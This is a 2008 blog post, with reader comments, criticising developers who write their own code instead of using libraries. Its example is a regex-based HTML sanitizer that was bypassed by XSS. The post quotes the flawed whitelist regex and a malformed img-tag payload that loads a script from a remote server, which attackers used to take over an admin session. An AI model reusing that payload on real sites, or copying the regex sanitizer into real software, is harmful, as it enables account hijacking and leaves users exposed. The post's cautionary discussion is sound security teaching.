I'm often surprised by how common it is for developers to prefer reinventing the wheel to using off-the-shelf libraries when solving problems tasks. This practice isn't limited to newbies who don't know any better but also to experienced developers who should. Experienced developers often make excuses about not wanting to take unnecessary dependencies or not trusting the code of others when justifying reinventing the wheel. For example, take this conversation that flowed through my Twitter stream yesterday

Jon Galloway
jongalloway: @
codinghorror Oh, one last thing - I'd rather trust the tough code (memory management, SSL, parsing) to experts and common libraries. about 11 hours ago from Witty in reply to codinghorror

Jeff Atwood
codinghorror @jongalloway you're right, coding is hard. Let's go shopping! about 12 hours ago from web in reply to jongalloway

Jeff Atwood
codinghorror @jongalloway I'd rather make my own mistakes (for things I care about) than blindly inherit other people's mistakes. YMMV. about 12 hours ago from web in reply to jongalloway

The background on this conversation is that Jeff Atwood (aka codinghorror) recently decided to quit his job and create a new Website called stackoverflow.com. It is a question and answer site for asking programming questions where users can vote on the best answers to specific questions. You can think of it as Yahoo! Answers but dedicated to programming questions. You can read a review of the site by Michiel de Mare for more information.

Recently Jeff Atwood blogged about how he was planning to use regular expressions to sanitize HTML input on StackOverflow.com in his blog post entitled Regular Expressions: Now You Have Two Problems where he wrote

I'd like to illustrate with an actual example, a regular expression I recently wrote to strip out dangerous HTML from input. This is extracted from the SanitizeHtml routine I posted on RefactorMyCode.

var whitelist =
 @"</?p>|<br\s?/?>|</?b>|</?strong>|</?i>|</?em>|
  </?s>|</?strike>|</?blockquote>|</?sub>|</?super>|
  </?h(1|2|3)>|</?pre>|<hr\s?/?>|</?code>|</?ul>|
  </?ol>|</?li>|</a>|<a[^>]+>|<img[^>]+/?>";

What do you see here? The variable name whitelist is a strong hint. One thing I like about regular expressions is that they generally look like what they're matching. You see a list of HTML tags, right? Maybe with and without their closing tags?

The problem Jeff was trying to solve is how to allow a subset of HTML tags while stripping out all other HTML so as to prevent cross site scripting (XSS) attacks. The problem with Jeff's approach which was pointed out in the comments by many people including Simon Willison is that using regexes to filter HTML input in this way assumes that you will get fairly well-formed HTML. The problem with that approach which many developers have found out the hard way is that you also have to worry about malformed HTML due to the liberal HTML parsing policies of many modern Web browsers. Thus to use this approach you have to pretty much reverse engineer every HTML parsing quirk of common browsers if you don't want to end up storing HTML which looks safe but actually contains an exploit. Thus to utilize this approach Jeff really should have been looking at using a full fledged HTML parser such as SgmlReader or Beautiful Soup instead of regular expressions.

It didn't take long for the users of StackOverflow.com to show Jeff the error of his ways as evidenced by his post Protecting Your Cookies: HttpOnly where he acknowledges his mistake as follows

So I have this friend. I've told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He's hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?

As it turns out, far more dangerous than expected.

Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.

How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page.

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. 

The sad thing is that Jeff Atwood isn't the first nor will he be the last programmer to think to himself "It's just HTML sanitization, how hard can it be?". There are many lists of Top HTML Validation Bloopers that show tricky it is to get the right solution to this seemingly trivial problem. Additionally, it is sad to note that despite his recent experience, Jeff Atwood still argues that he'd rather make his own mistakes than blindly inherit the mistakes of others as justification for continuing to reinvent the wheel in the future. That is unfortunate given that is a bad attitude for a professional software developer to have.

Rolling your own solution to a common problem should be the last option on your list not the first. Otherwise, you might just end up a candidate for The Daily WTF and deservedly so.

Now Playing: T-Pain - Cant Believe It (feat. Lil Wayne)


 

Sunday, 31 August 2008 22:48:03 (GMT Daylight Time, UTC+01:00)
There is seldom a single correct answer, there are always trade-offs to be weighed. And there are bugs in all code.

Is it true what they say about enterprise developers, that they are afraid of code?
Monday, 01 September 2008 13:41:43 (GMT Daylight Time, UTC+01:00)
Developers, using libraries is not a sign of weakness ...
... because you must be a tough guy to not cringe in pain when plunging into the design nightmare that these other libraries are.

I'm not well-informed, but it seems to me that there is no ready-made HTML sanitizer (proper parser and output guaranteed to be a valid subset of HTML) around?
Tuesday, 02 September 2008 21:31:35 (GMT Daylight Time, UTC+01:00)
Jeff also just twittered the other night about how he's dumping log4net because they found it was causing the deadlocks they were seeing. I don't know if it was really a problem in the library but his attitude was that he doesn't like "dependencies" or third-party libraries in general. I asked if he was going to roll his own logging or not log and he said he's "not a fan of logging". That's his choice obviously but it seems like a severe case of Not Invented Here syndrome on both of these topics.
Wednesday, 03 September 2008 05:24:45 (GMT Daylight Time, UTC+01:00)
I listen to Jeff and Joel's podcast, and Jeff seems to have a less than professional attitude to software development- he reminds me of myself 15 years ago when I thought I knew everything. Joel does try hard to keep him on track though...
Tony B
Thursday, 04 September 2008 06:00:02 (GMT Daylight Time, UTC+01:00)
Very thanks for you!! Oyun.
Saturday, 06 September 2008 11:17:42 (GMT Daylight Time, UTC+01:00)
I wrote about this subject a few years ago, and my opinion still holds. Executive summary: reinventing wheels is fine – it’s the only way to learn deeply. However, <em>putting those wheels into production</em> is not a proposition to take lightly; there, “pick your battles” applies.
Comments are closed.